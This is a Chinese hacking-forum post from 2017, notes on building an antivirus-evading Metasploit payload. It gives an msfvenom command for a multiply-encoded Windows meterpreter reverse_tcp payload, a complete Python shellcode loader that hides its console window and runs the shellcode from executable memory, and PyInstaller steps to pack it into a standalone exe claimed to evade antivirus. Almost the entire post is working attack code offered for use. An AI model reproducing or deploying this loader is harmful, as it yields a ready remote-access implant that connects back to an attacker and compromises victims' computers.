搜索
查看: 623|回复: 1

Metasploit生成免杀payload笔记

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-4-30 14:41:13 | 显示全部楼层 |阅读模式
  1. > msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -e x86/shikata_ga_nai -i 11 -f py -o C:/luan/luan.py

  2. DL is deprecated, please use Fiddle
  3. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  4. No Arch selected, selecting Arch: x86 from the payload
  5. Found 1 compatible encoders
  6. Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
  7. x86/shikata_ga_nai succeeded with size 360 (iteration=0)
  8. x86/shikata_ga_nai succeeded with size 387 (iteration=1)
  9. x86/shikata_ga_nai succeeded with size 414 (iteration=2)
  10. x86/shikata_ga_nai succeeded with size 441 (iteration=3)
  11. x86/shikata_ga_nai succeeded with size 468 (iteration=4)
  12. x86/shikata_ga_nai succeeded with size 495 (iteration=5)
  13. x86/shikata_ga_nai succeeded with size 522 (iteration=6)
  14. x86/shikata_ga_nai succeeded with size 549 (iteration=7)
  15. x86/shikata_ga_nai succeeded with size 576 (iteration=8)
  16. x86/shikata_ga_nai succeeded with size 603 (iteration=9)
  17. x86/shikata_ga_nai succeeded with size 630 (iteration=10)
  18. x86/shikata_ga_nai chosen with final size 630
  19. Payload size: 630 bytes
  20. Saved as: C:/luan/luan.py

  21. C:\PentestBox\bin\metasploit-framework
  22. >
复制代码
然后打开luan.py,修改成这样子:
  1. from ctypes import *
  2. import ctypes
  3. buf =  ""
  4. buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29"
  5. buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\xed\xfc\xe2"
  6. buf += "\xe2\xe6\x30\x37\xec\xba\xe0\xf0\x35\xc8\x36\x0b\x98"
  7. buf += "\x00\xfe\x42\xb3\x52\x5d\xb7\xb0\xc9\x4f\x34\x7f\xa8"
  8. buf += "\x6d\x6c\xd1\x7b\x77\xcd\x6d\x92\x35\x6a\x79\x41\x1d"
  9. buf += "\x16\x66\x6f\x97\xce\x5e\x17\xb3\xef\xdc\x73\xcb\xdb"
  10. buf += "\x3c\xd5\x6d\xfd\x01\x37\x1c\x73\xbf\x36\x58\xd4\x58"
  11. buf += "\x12\xce\x52\x67\x6c\xdb\x18\x8a\x25\xfa\x9f\x7d\xa3"
  12. buf += "\x9c\x49\xd9\xde\x7d\xc8\x1e\x10\xea\xff\x48\x4f\x31"
  13. buf += "\xb5\x13\x18\x05\x9b\x21\x7f\xd1\xd2\xae\x85\x96\x03"
  14. buf += "\x41\xcb\x11\x11\x70\x45\x0c\x64\xc3\xf5\xd8\x8f\x63"
  15. buf += "\x18\x82\xc3\xee\x9a\x08\xac\x37\xa0\xed\x1a\x57\x25"
  16. buf += "\x76\xd4\xde\xc0\x17\xa8\xeb\x1b\x12\x3c\x00\xf3\xf4"
  17. buf += "\xa2\x90\x60\xd6\x2d\x62\xb8\xbc\x32\xf3\x9d\x2b\x8a"
  18. buf += "\xd8\x8a\x27\x24\xc0\xfa\xd7\x72\xb1\x73\xc1\x91\x66"
  19. buf += "\xb8\x86\x61\x16\x12\x11\x32\x59\xd1\x20\x8f\x34\x26"
  20. buf += "\xd6\x98\xda\xc8\xfe\xcb\x91\xec\xb0\x5e\xd8\xa1\x8c"
  21. buf += "\x10\x95\xbd\x00\x81\x0c\xd9\x7a\xb1\xf3\xf6\x45\x0d"
  22. buf += "\x0f\x88\x5f\x9a\xd5\xf6\xbc\xd6\xfd\xa2\xb1\xef\x66"
  23. buf += "\xac\x1e\xa6\x28\x6c\x09\x14\xe8\x0c\x7f\xb6\x0a\x3a"
  24. buf += "\x4c\xf6\xc2\xbd\xd2\x0e\xea\x59\x2a\x69\x2c\x42\x62"
  25. buf += "\x18\x78\x8b\x32\x20\xb7\x46\x46\xa1\xbe\x0a\x9e\xa4"
  26. buf += "\x38\x74\x6d\x3d\x23\x0b\x2e\xd3\x76\xe6\x21\xb1\x69"
  27. buf += "\x5c\x55\x9e\xac\xa8\x04\x0b\x50\x7f\x99\x10\x72\x21"
  28. buf += "\xf5\x51\x99\xc0\xc2\x25\x5f\x06\x7a\x8a\xa9\x5e\xf4"
  29. buf += "\x5b\xe9\x6b\xc8\x50\xc1\xc5\x49\x89\x2a\x3a\x70\x0c"
  30. buf += "\xb0\x50\x0d\xa2\xa9\x18\xff\x30\xd9\x19\xdc\xb8\x9a"
  31. buf += "\xa1\x3e\x7c\x8f\xe0\x3e\xdf\xc5\x93\x18\x83\x25\x99"
  32. buf += "\x10\xab\xa3\x03\x98\xba\x83\x8f\x65\x83\xa2\xbb\x79"
  33. buf += "\x2f\xd7\xe1\xb1\xdb\xde\x59\xca\x4f\xa5\xb5\xfd\xa8"
  34. buf += "\x22\xdd\xa6\x41\xee\xcd\x8c\xaa\xb6\xf7\x24\xe9\xe0"
  35. buf += "\x9a\x0d\x59\x77\x81\x3f\x14\x60\x7e\xdd\x42\xd8\x9e"
  36. buf += "\x19\x96\x52\x5b\xca\x91\x28\xc0\x53\x48\x50\x8d\x51"
  37. buf += "\xa8\x23\x1b\x37\xdc\xd3\x7d\x8e\xc5\xd3\x2c\x05\xf2"
  38. buf += "\x8e\xb7\xf7\x68\xe1\x12\x6c\x9d\x6e\xb4\x98\x7c\x58"
  39. buf += "\xfa\xf2\x5f\x89\xd0\x99\xaf\xa5\x52\x6f\x25\xd3\x9b"
  40. buf += "\xa7\xa1\xaa\x56\x24\x75\xe3\x5f\x16\x02\x22\x10\xd0"
  41. buf += "\xb0\x83\xc4\xf9\xa0\x35\xfd\xce\x5d\x80\xbd\x4b\x43"
  42. buf += "\xf2\xf2\x61\x72\xba\xe7\x4a\xd3\xa9\x0e\x83\x3f\xc9"
  43. buf += "\x44\x41\x1f\xf2\x01\x28\x60\x5c\x01\xcd\x64\x20\x97"
  44. buf += "\xa6\x64\xb4\x3d\x2b\xdb\x78\xf4\xa4\xfd\x39\xb9\x9d"
  45. buf += "\x0c\x53\x3b\x08\xb7\x8a\x97\x85\xa5\x10\x4b\xca\x60"
  46. buf += "\x51\xca\xb0\x50\xce\xf4\x2e\xbb\x59\xa6\x4b\x29\xe5"
  47. buf += "\x19\x90\xe1\x31\xc6\xaa\x6b\xfe\xd3\xdd\xd9\x9c\xf9"
  48. buf += "\xae\xfc\x3a\x10\x50\x85\xf4\xc6\xa0\x54\x9d\x76\x1e"
  49. buf += "\x95\xad\x4e\x77\x6d\xd6\x75\x2b\x6f\x12\x58\x3f\xde"
  50. buf += "\x3a\x72\xd1\x90\x65\xa8\x11\x60\x0e\x22\x60\xeb\x7a"
  51. buf += "\xc7\x13\x6f\xaf\x56\x5b\x71\xdc\xa2\x6a\x7d\xfa\x42"
  52. buf += "\x90\x82\x01\xd5\x98\x6d"

  53. #libc = CDLL('libc.so.6')
  54. PROT_READ = 1
  55. PROT_WRITE = 2
  56. PROT_EXEC = 4
  57. def executable_code(buffer):
  58.     buf = c_char_p(buffer)
  59.     size = len(buffer)
  60.     addr = libc.valloc(size)
  61.     addr = c_void_p(addr)
  62.     if 0 == addr:  
  63.         raise Exception("Failed to allocate memory")
  64.     memmove(addr, buf, size)
  65.     if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
  66.         raise Exception("Failed to set protection on buffer")
  67.     return addr
  68. VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
  69. VirtualProtect = ctypes.windll.kernel32.VirtualProtect
  70. shellcode = bytearray(buf)
  71. whnd = ctypes.windll.kernel32.GetConsoleWindow()   
  72. if whnd != 0:
  73.         if 666==666:
  74.                 ctypes.windll.user32.ShowWindow(whnd, 0)   
  75.                 ctypes.windll.kernel32.CloseHandle(whnd)
  76. print ".................................."*666
  77. memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
  78.                                           ctypes.c_int(len(shellcode)),
  79.                                           ctypes.c_int(0x3000),
  80.                                           ctypes.c_int(0x40))
  81. buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  82. old = ctypes.c_long(1)
  83. VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
  84. ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
  85.                                      buf,
  86.                                      ctypes.c_int(len(shellcode)))
  87. shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
  88. print "Code By Luan"
  89. shell()
复制代码
下载pywin32解压运行,一直点下一步就可以了。
下载pyinstall解压然后执行:(这里注意路径中不要带中文,Win10貌似需要管理员权限运行)
  1. C:\Luan>cd C:\pyinstaller-2.0
  2. C:\pyinstaller-2.0>python PyInstaller.py --console --onefile msf.py
复制代码
然后就能在C:\pyinstaller-2.0\luan\dist目录下找到luan.exe,免杀。
如果生成不成功,或者生成的exe运行不了等问题,请重新安装环境,确保是32位的环境。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表